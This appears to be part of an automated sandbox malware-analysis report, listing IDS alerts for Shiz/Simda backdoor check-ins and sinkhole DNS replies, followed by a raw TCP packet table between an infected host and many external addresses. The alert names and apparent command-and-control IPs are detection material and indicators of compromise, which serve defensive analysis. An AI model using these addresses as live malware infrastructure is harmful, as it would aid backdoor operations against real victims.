2024-08-23T18:44:16.499388+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	61322	80	192.168.2.5	15.197.240.20
2024-08-23T18:44:16.499388+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	61322	80	192.168.2.5	15.197.240.20
2024-08-23T18:42:12.851519+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49710	80	192.168.2.5	44.221.84.105
2024-08-23T18:42:12.851519+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49710	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:27.748480+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63535	80	192.168.2.5	15.197.240.20
2024-08-23T18:43:27.748480+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63535	80	192.168.2.5	15.197.240.20
2024-08-23T18:44:05.642374+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50850	80	192.168.2.5	64.225.91.73
2024-08-23T18:44:05.642374+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50850	80	192.168.2.5	64.225.91.73
2024-08-23T18:42:12.969833+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	49713	18.208.156.248	192.168.2.5
2024-08-23T18:42:12.969833+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	49713	18.208.156.248	192.168.2.5
2024-08-23T18:42:12.051514+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	50783	1.1.1.1	192.168.2.5
2024-08-23T18:43:35.030592+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59533	80	192.168.2.5	18.208.156.248
2024-08-23T18:43:35.030592+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59533	80	192.168.2.5	18.208.156.248
2024-08-23T18:42:28.454333+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49730	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:28.454333+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49730	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:35.027988+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59535	80	192.168.2.5	3.94.10.34
2024-08-23T18:43:35.027988+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59535	80	192.168.2.5	3.94.10.34
2024-08-23T18:42:11.847367+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	61390	1.1.1.1	192.168.2.5
2024-08-23T18:42:28.191275+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49733	80	192.168.2.5	103.150.11.230
2024-08-23T18:42:28.191275+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49733	80	192.168.2.5	103.150.11.230
2024-08-23T18:44:04.518140+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50849	80	192.168.2.5	13.248.169.48
2024-08-23T18:44:04.518140+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50849	80	192.168.2.5	13.248.169.48
2024-08-23T18:43:36.838567+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59541	80	192.168.2.5	85.17.31.122
2024-08-23T18:43:36.838567+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59541	80	192.168.2.5	85.17.31.122
2024-08-23T18:43:42.376596+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59531	80	192.168.2.5	172.234.222.143
2024-08-23T18:43:42.376596+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59531	80	192.168.2.5	172.234.222.143
2024-08-23T18:43:35.062846+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59537	80	192.168.2.5	208.100.26.245
2024-08-23T18:43:35.062846+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59537	80	192.168.2.5	208.100.26.245
2024-08-23T18:42:16.708223+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49707	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:16.708223+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49707	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:03.299572+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	62489	1.1.1.1	192.168.2.5
2024-08-23T18:42:49.269857+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	63105	1.1.1.1	192.168.2.5
2024-08-23T18:43:46.683786+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50843	80	192.168.2.5	18.208.156.248
2024-08-23T18:43:46.683786+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50843	80	192.168.2.5	18.208.156.248
2024-08-23T18:42:47.735451+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	60684	80	192.168.2.5	3.64.163.50
2024-08-23T18:42:47.735451+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	60684	80	192.168.2.5	3.64.163.50
2024-08-23T18:43:17.172160+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63520	80	192.168.2.5	15.197.240.20
2024-08-23T18:43:17.172160+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63520	80	192.168.2.5	15.197.240.20
2024-08-23T18:43:35.200911+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59529	80	192.168.2.5	3.64.163.50
2024-08-23T18:43:35.200911+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59529	80	192.168.2.5	3.64.163.50
2024-08-23T18:42:25.750815+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49725	80	192.168.2.5	172.234.222.143
2024-08-23T18:42:25.750815+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49725	80	192.168.2.5	172.234.222.143
2024-08-23T18:43:00.681002+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49730	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:00.681002+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49730	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:35.779967+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59540	80	192.168.2.5	91.195.240.19
2024-08-23T18:42:12.931770+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49711	80	192.168.2.5	44.221.84.105
2024-08-23T18:42:12.931770+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49711	80	192.168.2.5	44.221.84.105
2024-08-23T18:44:06.065128+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50851	80	192.168.2.5	154.85.183.50
2024-08-23T18:44:06.065128+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50851	80	192.168.2.5	154.85.183.50
2024-08-23T18:43:34.336361+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	57825	1.1.1.1	192.168.2.5
2024-08-23T18:43:29.163916+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	62685	80	192.168.2.5	72.52.179.174
2024-08-23T18:43:29.163916+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	62685	80	192.168.2.5	72.52.179.174
2024-08-23T18:43:35.089912+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59530	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:35.089912+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59530	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:27.546643+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49731	80	192.168.2.5	18.208.156.248
2024-08-23T18:42:27.546643+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49731	80	192.168.2.5	18.208.156.248
2024-08-23T18:43:07.469104+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63522	80	192.168.2.5	103.224.182.252
2024-08-23T18:43:07.469104+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63522	80	192.168.2.5	103.224.182.252
2024-08-23T18:43:08.051046+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63521	80	192.168.2.5	154.85.183.50
2024-08-23T18:43:08.051046+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63521	80	192.168.2.5	154.85.183.50
2024-08-23T18:42:46.926972+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49741	80	192.168.2.5	13.248.169.48
2024-08-23T18:42:46.926972+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49741	80	192.168.2.5	13.248.169.48
2024-08-23T18:42:47.479722+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	60684	80	192.168.2.5	3.64.163.50
2024-08-23T18:42:47.479722+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	60684	80	192.168.2.5	3.64.163.50
2024-08-23T18:42:14.001355+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49714	80	192.168.2.5	199.191.50.83
2024-08-23T18:42:14.001355+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49714	80	192.168.2.5	199.191.50.83
2024-08-23T18:43:54.017141+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59547	80	192.168.2.5	13.248.169.48
2024-08-23T18:43:54.017141+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59547	80	192.168.2.5	13.248.169.48
2024-08-23T18:43:36.643118+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59530	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:36.643118+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59530	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:13.036411+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49709	80	192.168.2.5	3.64.163.50
2024-08-23T18:42:13.036411+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49709	80	192.168.2.5	3.64.163.50
2024-08-23T18:43:33.519751+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	60101	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:33.519751+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	60101	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:31.677081+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	49369	52.34.198.229	192.168.2.5
2024-08-23T18:43:31.677081+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	49369	52.34.198.229	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2024 18:42:12.035316944 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:12.040184975 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:12.040251017 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:12.040391922 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:12.045576096 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:12.052241087 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:42:12.058074951 CEST	80	49708	162.255.119.102	192.168.2.5
Aug 23, 2024 18:42:12.058132887 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:42:12.058268070 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:42:12.063615084 CEST	80	49708	162.255.119.102	192.168.2.5
Aug 23, 2024 18:42:12.180255890 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:12.185142040 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:12.185444117 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:12.185635090 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:12.190721989 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:12.363876104 CEST	49710	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.370148897 CEST	80	49710	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.370213985 CEST	49710	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.370343924 CEST	49710	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.375123024 CEST	80	49710	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.455657959 CEST	49711	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.460650921 CEST	80	49711	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.460725069 CEST	49711	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.460902929 CEST	49711	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.465804100 CEST	80	49711	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.474725962 CEST	49712	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:42:12.479620934 CEST	80	49712	3.94.10.34	192.168.2.5
Aug 23, 2024 18:42:12.479717970 CEST	49712	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:42:12.479856014 CEST	49712	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:42:12.484867096 CEST	80	49712	3.94.10.34	192.168.2.5
Aug 23, 2024 18:42:12.492944956 CEST	49713	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:12.498248100 CEST	80	49713	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:12.498327971 CEST	49713	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:12.498455048 CEST	49713	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:12.503422976 CEST	80	49713	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:12.526119947 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:12.531367064 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:12.531430006 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:12.531565905 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:12.536374092 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:12.539786100 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:42:12.545331955 CEST	80	49715	208.100.26.245	192.168.2.5
Aug 23, 2024 18:42:12.545420885 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:42:12.545572996 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:42:12.550399065 CEST	80	49715	208.100.26.245	192.168.2.5
Aug 23, 2024 18:42:12.611215115 CEST	49716	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:42:12.617096901 CEST	80	49716	69.162.80.57	192.168.2.5
Aug 23, 2024 18:42:12.617158890 CEST	49716	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:42:12.617311001 CEST	49716	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:42:12.622442961 CEST	80	49716	69.162.80.57	192.168.2.5
Aug 23, 2024 18:42:12.784838915 CEST	80	49708	162.255.119.102	192.168.2.5
Aug 23, 2024 18:42:12.784898996 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:42:12.837832928 CEST	49717	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:12.841449976 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:12.841492891 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:12.842881918 CEST	80	49717	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:12.842936039 CEST	49717	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:12.843050003 CEST	49717	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:12.844866991 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:12.847852945 CEST	80	49717	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:12.849848032 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:12.850501060 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:12.851449966 CEST	80	49710	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.851519108 CEST	49710	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.851573944 CEST	80	49710	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.851618052 CEST	49710	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.855365038 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:12.855427027 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:12.855525970 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:12.857392073 CEST	49710	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.860296965 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:12.862360001 CEST	80	49710	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.931709051 CEST	80	49711	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.931770086 CEST	49711	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.933028936 CEST	80	49711	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.933082104 CEST	49711	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.933795929 CEST	49711	80	192.168.2.5	44.221.84.105
Aug 23, 2024 18:42:12.939016104 CEST	80	49711	44.221.84.105	192.168.2.5
Aug 23, 2024 18:42:12.965327978 CEST	80	49712	3.94.10.34	192.168.2.5
Aug 23, 2024 18:42:12.965415955 CEST	49712	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:42:12.965687990 CEST	80	49712	3.94.10.34	192.168.2.5
Aug 23, 2024 18:42:12.965817928 CEST	49712	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:42:12.966599941 CEST	49712	80	192.168.2.5	3.94.10.34
Aug 23, 2024 18:42:12.969409943 CEST	80	49713	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:12.969463110 CEST	49713	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:12.969832897 CEST	80	49713	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:12.969876051 CEST	49713	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:12.970216990 CEST	49713	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:12.971386909 CEST	80	49712	3.94.10.34	192.168.2.5
Aug 23, 2024 18:42:12.976046085 CEST	80	49713	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:13.036350965 CEST	80	49709	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:13.036411047 CEST	49709	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:13.059153080 CEST	80	49715	208.100.26.245	192.168.2.5
Aug 23, 2024 18:42:13.059216976 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:42:13.060755968 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:42:13.065809011 CEST	80	49715	208.100.26.245	192.168.2.5
Aug 23, 2024 18:42:13.139326096 CEST	80	49716	69.162.80.57	192.168.2.5
Aug 23, 2024 18:42:13.139962912 CEST	80	49716	69.162.80.57	192.168.2.5
Aug 23, 2024 18:42:13.140367985 CEST	49716	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:42:13.147505045 CEST	49716	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:42:13.153172970 CEST	80	49716	69.162.80.57	192.168.2.5
Aug 23, 2024 18:42:13.180573940 CEST	80	49715	208.100.26.245	192.168.2.5
Aug 23, 2024 18:42:13.180850029 CEST	49715	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:42:13.336708069 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:42:13.341568947 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:42:13.341730118 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:42:13.341821909 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:42:13.346618891 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:42:13.351444960 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:42:13.356256962 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:42:13.356463909 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:42:13.356463909 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:42:13.361661911 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:42:13.792238951 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:13.792450905 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792463064 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792474031 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792493105 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792543888 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792555094 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792563915 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792577028 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792579889 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.792587996 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:13.792625904 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792638063 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792653084 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.792680979 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.792711020 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.793088913 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:13.793118000 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.793175936 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.793235064 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.793236971 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:13.797569990 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.797580957 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.797591925 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.797677994 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.797689915 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.797703981 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.797758102 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.797758102 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.797926903 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.797995090 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.798006058 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.798017979 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.798021078 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.798032045 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.798053980 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.798433065 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.798811913 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.798824072 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.799072027 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.799072027 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.799499035 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.804204941 CEST	80	49718	91.195.240.19	192.168.2.5
Aug 23, 2024 18:42:13.804297924 CEST	49718	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:42:13.806618929 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:13.806663036 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:13.807195902 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:13.837013006 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:13.837042093 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:14.001137018 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:42:14.001153946 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:42:14.001163960 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:42:14.001249075 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001260042 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001277924 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001281977 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001287937 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001311064 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:42:14.001354933 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.001354933 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.001629114 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001638889 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001650095 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001674891 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.001688004 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001699924 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.001710892 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.001756907 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.001756907 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.006149054 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.006160975 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.006170988 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.008030891 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.087893963 CEST	80	49720	208.91.196.145	192.168.2.5
Aug 23, 2024 18:42:14.088208914 CEST	49720	80	192.168.2.5	208.91.196.145
Aug 23, 2024 18:42:14.089649916 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.089674950 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.089687109 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.089696884 CEST	80	49714	199.191.50.83	192.168.2.5
